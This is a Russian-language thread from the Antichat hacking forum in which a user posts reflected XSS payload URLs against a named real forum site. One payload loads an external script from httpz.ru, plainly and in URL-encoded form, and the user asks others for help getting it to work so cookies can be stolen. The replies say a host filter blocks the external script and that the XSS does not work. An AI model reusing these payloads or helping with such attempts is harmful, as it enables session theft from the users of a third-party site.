ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   пасивная xss (https://forum.antichat.xyz/showthread.php?t=8055934)

muinmyha 26.04.2012 01:00

Всем привет не могу использовать найденную xss
вот сама пасивка
http://piratia-world.ru/forum/index.php/%F6%22%20onmouseover=prompt">alert('xss')

[url]http://piratia-world.ru/forum/index.php/%F6%22%20onmouseover=prompt%22%3E%3Cscript%3Ealert ('xss')%3C/script%3E

если сделать [url]http://piratia-world.ru/forum/index.php/%F6%22%20onmouseover=prompt%3CSCRIPT type=text/javascript src=http://httpz.ru/160u4vl3pjgo.js>

перекидывает на http://sweb.ru/insecure
Запрос отвергнут

Запрос небезопасен и был отвергнут.

Если это Ваш сайт — обратитесь в отдел технической поддержки за разъяснениями.

Или может я что не правильно делаю, или это вообще не уязвимость
Помогите, и объясните что не так..

MaCroSs 26.04.2012 01:00

У них фильтр не пускает вообщем ни на какой сайт,тоесть куки скорее всего украсть ты несможеш

muinmyha 26.04.2012 01:00

пробывал, не получается, может что не правильно делаю...

[url]http://piratia-world.ru/forum/index.php/%F6%22%20onmouseover=prompt%25%33%43%53%43%52%49%5 0%54%20%74%79%70%65%3D%74%65%78%74%2F%6A%61%76%61% 73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F %2F%68%74%74%70%7A%2E%72%75%2F%31%36%30%75%34%76%6 C%33%70%6A%67%6F%2E%6A%73%3E%3C%2F%53%43%52%49%50% 54%3E

выдает Not Found

The requested URL /forum/index.php/ö" onmouseover=prompt%3CSCRIPT type=text/javascript src=http://httpz.ru/160u4vl3pjgo.js> was not found on this server.

WhiteHacK 26.04.2012 01:00

XSS не работает.


Время: 20:57